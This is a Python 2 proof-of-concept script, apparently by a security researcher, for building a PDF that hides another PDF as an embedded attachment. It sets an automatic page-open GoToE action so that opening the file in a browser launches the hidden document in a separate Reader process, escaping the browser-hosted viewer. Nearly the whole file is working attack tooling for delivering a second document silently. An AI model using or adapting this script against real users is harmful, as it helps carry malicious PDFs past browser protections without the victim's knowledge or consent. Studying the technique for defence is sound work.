##########################################################################
#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####
#### http://twitter.com/feliam * http://wordpress.com/feliam ####
##########################################################################
__doc__ = '''
This opens a different Reader process when run from the browser. GotoE technique.
It expects a complete PDF to to jump to from the browser.
Usage:
python escapeBrowser.py standalone.pdf > browser.pdf
'''
import struct,zlib,sys,hashlib,random
##TODO
## getattribute and setattribute must by pythonic!!
## References may be used to get actual object!
#For constructing a minimal pdf file
## PDF REference 3rd edition:: 3.2 Objects
class PDFObject:
def __init__(self):
self.n=None
self.v=None
def __str__(self):
raise "Fail"
## PDF REference 3rd edition:: 3.2.1 Booleans Objects
class PDFBool(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
if self.s:
return "true"
return "false"
## PDF REference 3rd edition:: 3.2.2 Numeric Objects
class PDFNum(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "%s"%self.s
## PDF REference 3rd edition:: 3.2.3 String Objects
class PDFString(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "(%s)"%self.s
## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings
class PDFHexString(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">"
## A convenient type of literal Strings
class PDFOctalString(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s="".join(["\\%03o"%ord(c) for c in s])
def __str__(self):
return "(%s)"%self.s
## PDF REference 3rd edition:: 3.2.4 Name Objects
class PDFName(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "/%s"%self.s
## PDF REference 3rd edition:: 3.2.5 Array Objects
class PDFArray(PDFObject):
def __init__(self,s):
PDFObject.__init__(self)
self.s=s
def __str__(self):
return "[%s]"%(" ".join([ o.__str__() for o in self.s]))
## PDF REference 3rd edition:: 3.2.6 Dictionary Objects
class PDFDict(PDFObject):
def __init__(self, d={}):
PDFObject.__init__(self)
self.dict = {}
for k in d:
self.dict[k]=d[k]
def add(self,name,obj):
self.dict[name] = obj
def __getattr__(self,name):
try:
return self.dict[name]
except:
raise AttributeError
def __str__(self):
s="<<"
for name in self.dict:
s+="%s %s "%(PDFName(name),self.dict[name])
s+=">>"
return s
## PDF REference 3rd edition:: 3.2.7 Stream Objects
class PDFStream(PDFDict):
def __init__(self,stream=""):
PDFDict.__init__(self)
self.stream=stream
self.filtered=self.stream
self.filters = []
def appendFilter(self, filter):
self.filters.append(filter)
self._applyFilters() #yeah every time .. so what!
def _applyFilters(self):
self.filtered = self.stream
for f in self.filters:
self.filtered = f.encode(self.filtered)
self.add('Length', len(self.filtered))
if len(self.filters)>0:
self.add('Filter', PDFArray([f.name for f in self.filters]))
#Add Filter parameters ?
def __str__(self):
self._applyFilters() #yeah every time .. so what!
s=""
s+=PDFDict.__str__(self)
s+="\nstream\n"
s+=self.filtered
s+="\nendstream"
return s
## PDF REference 3rd edition:: 3.2.8 Null Object
class PDFNull(PDFObject):
def __init__(self):
PDFObject.__init__(self)
def __str__(self):
return "null"
## PDF REference 3rd edition:: 3.2.9 Indirect Objects
class PDFRef(PDFObject):
def __init__(self,obj):
PDFObject.__init__(self)
self.obj=[obj]
def __str__(self):
return "%d %d R"%(self.obj[0].n,self.obj[0].v)
def get(self):
return self.obj[0]
## PDF REference 3rd edition:: 3.3 Filters
## Example Filter...
class FlateDecode:
name = PDFName('FlateDecode')
def __init__(self):
pass
def encode(self,stream):
return zlib.compress(stream)
def decode(self,stream):
return zlib.decompress(stream)
## PDF REference 3rd edition:: 3.4 File Structure
## Simplest file structure...
class PDFDoc():
def __init__(self,obfuscate=0):
self.objs=[]
self.info=None
self.root=None
def setRoot(self,root):
self.root=root
def getRoot(self):
return self.root
def setInfo(self,info):
self.info=info
def _add(self,obj):
if obj.v!=None or obj.n!=None:
raise "Already added!!!"
obj.v=0
obj.n=1+len(self.objs)
self.objs.append(obj)
def add(self,obj):
if type(obj) != type([]):
self._add(obj);
else:
for o in obj:
self._add(o)
def _header(self):
return "%PDF-1.3\n%\xE7\xF3\xCF\xD3\n"
def __str__(self):
doc1 = self._header()
xref = {}
for obj in self.objs:
xref[obj.n] = len(doc1)
doc1+="%d %d obj\n"%(obj.n,obj.v)
doc1+=obj.__str__()
doc1+="\nendobj\n"
posxref=len(doc1)
doc1+="xref\n"
doc1+="0 %d\n"%(len(self.objs)+1)
doc1+="0000000000 65535 f \n"
for xr in xref.keys():
doc1+= "%010d %05d n \n"%(xref[xr],0)
doc1+="trailer\n"
trailer = PDFDict()
trailer.add("Size",len(self.objs)+1)
trailer.add("Root",PDFRef(self.root))
if self.info:
trailer.add("Info",PDFRef(self.info))
doc1+=trailer.__str__()
doc1+="\nstartxref\n%d\n"%posxref
doc1+="%%EOF"
return doc1
class FlateDecode:
name = PDFName('FlateDecode')
def __init__(self):
pass
def encode(self,stream):
return zlib.compress(stream)
def decode(self,stream):
return zlib.decompress(stream)
#The ... 'POC'
class PDFHider:
def _gotoE(self, name, next=None):
#action
action = PDFDict()
action.add('S',PDFName('GoToE'))
action.add('NewWindow',PDFBool(self.newWindow))
action.add('T',PDFDict({'N': name, 'R': PDFName('C'),'NewWindow': PDFBool(self.newWindow)
}))
if next:
action.add('Next', next)
return action
def _zipEmbeddFile(self,fileStr,minimal=False):
ef = PDFStream(fileStr)
if not minimal:
ef.add('Type', PDFName('EmbeddedFile'))
ef.add('Subtype',PDFName('application#2Fpdf'))
ef.add('Params',PDFDict({'Size': PDFNum(len(fileStr)),
'CheckSum': PDFOctalString(hashlib.md5(fileStr).digest())}) )
ef.add('DL', ' %d '%len(fileStr))
ef.appendFilter(FlateDecode())
return ef
def _filespec(self, name, embedded):
#fileSpec
filespec = PDFDict()
filespec.add('Type',PDFName('Filespec'))
filespec.add('F',PDFString(name))
embeddedlst = PDFDict()
embeddedlst.add('F',PDFRef(embedded))
filespec.add('EF', embeddedlst)
self.doc.add(filespec)
return PDFRef(filespec)
def __init__(self,fileStr,filename,newWindow=True):
self.newWindow = newWindow
if fileStr == None :
fileStr = file(filename).read()
self.doc = PDFDoc()
#outline
outlines = PDFDict()
outlines.add('Type', PDFName('Outlines'))
outlines.add('Count',PDFNum(0))
#pages
pages = PDFDict()
pages.add('Type', PDFName('Pages'))
action = self._gotoE(PDFHexString('attach'.encode('utf-16')))
self.doc.add(action)
#Names
names = PDFDict()
#catalog
catalog = PDFDict()
catalog.add('Type', PDFName('Catalog'))
catalog.add('Outlines', PDFRef(outlines))
catalog.add('Pages', PDFRef(pages))
catalog.add('Names', PDFRef(names))
catalog.add('ViewerPreferences', '<<>>')
#lets add those to doc just for showing up the Ref object.
self.doc.add([catalog,outlines,pages])
#Set the pdf root, added so we can brand it in the First pdfobj... jojojo
self.doc.setRoot(catalog)
#1 page!
font = PDFDict()
font.add('Type',PDFName('Font'))
font.add('Subtype',PDFName('Type1'))
font.add('Name',PDFName('F1'))
font.add('BaseFont',PDFName('Helvetica'))
font.add('Encoding',PDFName('MacRomanEncoding'))
self.doc.add(font)
contents = PDFStream('BT /F1 24 Tf 0 20 Td (Shell pdf!) Tj ET')
resources = PDFDict()
resources.add('ProcSet', PDFArray([PDFName('PDF'), PDFName('Text')]))
resources.add('Font', PDFDict({'F1': PDFRef(font)}))
#The pdf page
page = PDFDict()
page.add('Type', PDFName('Page'))
page.add('Parent', PDFRef(pages))
page.add('Contents', PDFRef(contents))
page.add('Resources', PDFRef(resources))
[self.doc.add(x) for x in [contents, resources, page]]
pages.add('Count', PDFNum(1))
pages.add('Kids',PDFArray([PDFRef(page)]))
embedded = self._zipEmbeddFile(fileStr)
self.doc.add(embedded)
#Names
namesToFiles = PDFDict()
namesToFiles.add('Names', PDFArray([
PDFHexString('attach'.encode('utf-16')),self._filespec(filename, embedded)]))
names.add('EmbeddedFiles',namesToFiles)
self.doc.add(names)
#open action to page
page.add('AA',PDFDict({'O': PDFRef(action)}))
def __str__(self):
#render it
return self.doc.__str__()
if __name__=='__main__':
if len(sys.argv) == 1:
print __doc__
sys.exit(-1)
filename = sys.argv[1]
pdf = file(filename,"r").read()
print str(PDFHider(pdf,filename,True))